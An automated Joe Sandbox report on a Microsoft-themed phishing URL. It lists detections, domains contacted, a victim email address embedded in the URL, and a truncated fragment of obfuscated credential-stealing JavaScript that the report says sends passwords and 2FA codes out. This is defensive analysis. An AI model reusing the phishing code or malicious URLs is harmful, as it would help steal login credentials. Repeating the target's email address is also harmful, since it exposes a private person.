Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://keep.za.com/cgi//redirect.php#rbruening@elford.com

Overview

General Information

Sample URL:	https://keep.za.com/cgi//redirect.php#rbruening@elford.com
Analysis ID:	1608754
Infos:

Detection

HtmlDropper

Score:	60
Range:	0 - 100
Confidence:	100%

Signatures

AI detected phishing page

Yara detected Html Dropper

AI detected suspicious Javascript

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden javascript code

Invalid 'forgot password' link found

Javascript checks online IP of machine

No HTML title found

Stores files to the Windows start menu directory

URL contains potential PII (phishing indication)

Classification

×

Process Tree

System is w10x64_ra

chrome.exe (PID: 5552 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6768 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1956,i,6581263779815864147,17771507680749106533,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://keep.za.com/cgi//redirect.php#rbruening@elford.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_87	JoeSecurity_HtmlDropper_3	Yara detected Html Dropper	Joe Security

HTML

Source	Rule	Description	Author	Strings
2.12..script.csv	JoeSecurity_HtmlDropper_3	Yara detected Html Dropper	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=rbruening%40elford.com

Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'keep.za.com' does not match the legitimate domain 'microsoft.com'., The domain 'za.com' is a generic domain and not directly associated with Microsoft., The presence of an input field for 'Enter Password' on a non-Microsoft domain is suspicious., The URL does not contain any direct reference to Microsoft, which is a common tactic in phishing attempts. DOM: 2.7.pages.csv

AI detected suspicious Javascript

Source: 2.12..script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: https://avsbtech.store/cgi/xls/c1g2i.js... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script appears to be collecting sensitive user information, such as passwords and 2FA codes, and sending it to potentially malicious domains. Additionally, the script uses aggressive DOM manipulation and legacy practices, further increasing the risk. While some contextual factors, such as the use of the Microsoft brand, could suggest legitimate intent, the overall behavior of the script is highly suspicious and indicative of a malicious phishing attempt.

Source: https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=rbruening%40elford.com

HTTP Parser: Number of links: 0

Source: https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=rbruening%40elford.com

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://keep.za.com/cgi//redirect.php#rbruening@elford.com

HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#B20F03" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#B20F03" d="M17.038 18.615H14.87L14.563 9.5h2....

Source: https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=rbruening%40elford.com

HTTP Parser: Invalid link: Forgot Password?

Source: https://avsbtech.store/cgi/xls/c1g2i.js

HTTP Parser: var _0xfd5851=_0x4a58;(function(_0x20ed6a,_0x216494){var _0x2fed19=_0x4a58,_0x250033=_0x20ed6a();while(!![]){try{var _0x9ac117=-parseint(_0x2fed19(0x182))/0x1+-parseint(_0x2fed19(0x1c9))/0x2+-parseint(_0x2fed19(0x1b5))/0x3*(parseint(_0x2fed19(0x1ac))/0x4)+parseint(_0x2fed19(0x1df))/0x5*(parseint(_0x2fed19(0x192))/0x6)+-parseint(_0x2fed19(0x1f8))/0x7+-parseint(_0x2fed19(0x188))/0x8+parseint(_0x2fed19(0x1c6))/0x9;if(_0x9ac117===_0x216494)break;else _0x250033['push'](_0x250033['shift']());}catch(_0x25c10d){_0x250033['push'](_0x250033['shift']());}}}(_0x3e16,0xf1344));function _0x3e16(){var _0x155ae0=['status','onmessage','animate','data','createelement','html','approve_number','<div><div\x20class=\x22footernode\x22>\x20<span\x20id=\x22c2024\x22>2024\x20microsoft</span><a\x20data-bind=\x22text:\x20config.text.privacyandcookies,\x20attr:\x20{\x27data-url\x27:\x20config.links.privacyandcookies}\x22\x20href=\x22#\x22\x20id=\x22pst\x22\x20data-url=\x22https://go.microsoft.com/fwlink/?linkid=521839\x22>privacy\x20sta...

Source: https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=rbruening%40elford.com	HTTP Parser: HTML title missing
Source: https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=rbruening%40elford.com	HTTP Parser: HTML title missing

Source: https://keep.za.com/cgi//redirect.php#rbruening@elford.com	Sample URL: PII: rbruening@elford.com
Source: https://keep.za.com/cgi//redirect.php#rbruening@elford.com	Sample URL: PII: rbruening@elford.com
Source: https://keep.za.com/cgi//redirect.php#rbruening@elford.com	Sample URL: PII: rbruening@elford.com
Source: https://keep.za.com/cgi//redirect.php#rbruening@elford.com	Sample URL: PII: rbruening@elford.com
Source: https://keep.za.com/cgi//redirect.php#rbruening@elford.com	Sample URL: PII: rbruening@elford.com
Source: https://keep.za.com/cgi//redirect.php#rbruening@elford.com	Sample URL: PII: rbruening@elford.com
Source: https://keep.za.com/cgi//redirect.php#rbruening@elford.com	Sample URL: PII: rbruening@elford.com
Source: https://keep.za.com/cgi//redirect.php#rbruening@elford.com	Sample URL: PII: rbruening@elford.com
Source: https://keep.za.com/cgi//redirect.php#rbruening@elford.com	Sample URL: PII: rbruening@elford.com
Source: https://keep.za.com/cgi//redirect.php#rbruening@elford.com	Sample URL: PII: rbruening@elford.com
Source: https://keep.za.com/cgi//redirect.php#rbruening@elford.com	Sample URL: PII: rbruening@elford.com
Source: https://keep.za.com/cgi//redirect.php#rbruening@elford.com	Sample URL: PII: rbruening@elford.com
Source: https://keep.za.com/cgi//redirect.php#rbruening@elford.com	Sample URL: PII: rbruening@elford.com

Source: https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=rbruening%40elford.com

HTTP Parser: <input type="password" .../> found

Source: https://keep.za.com/cgi//redirect.php#rbruening@elford.com	HTTP Parser: No favicon
Source: https://keep.za.com/cgi//redirect.php#rbruening@elford.com	HTTP Parser: No favicon
Source: https://keep.za.com/cgi//redirect.php#rbruening@elford.com	HTTP Parser: No favicon
Source: https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=rbruening%40elford.com	HTTP Parser: No favicon
Source: https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=rbruening%40elford.com	HTTP Parser: No favicon
Source: https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=rbruening%40elford.com	HTTP Parser: No favicon

Source: https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=rbruening%40elford.com	HTTP Parser: No <meta name="author".. found
Source: https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=rbruening%40elford.com	HTTP Parser: No <meta name="author".. found

Source: https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=rbruening%40elford.com	HTTP Parser: No <meta name="copyright".. found
Source: https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=rbruening%40elford.com	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.16:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.16:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49995 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.77.188
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200

Source: global traffic	DNS traffic detected: DNS query: keep.za.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: avsbtech.store
Source: global traffic	DNS traffic detected: DNS query: linxcoded.store
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: server.linxcoded.store
Source: global traffic	DNS traffic detected: DNS query: _6060._https.server.linxcoded.store
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
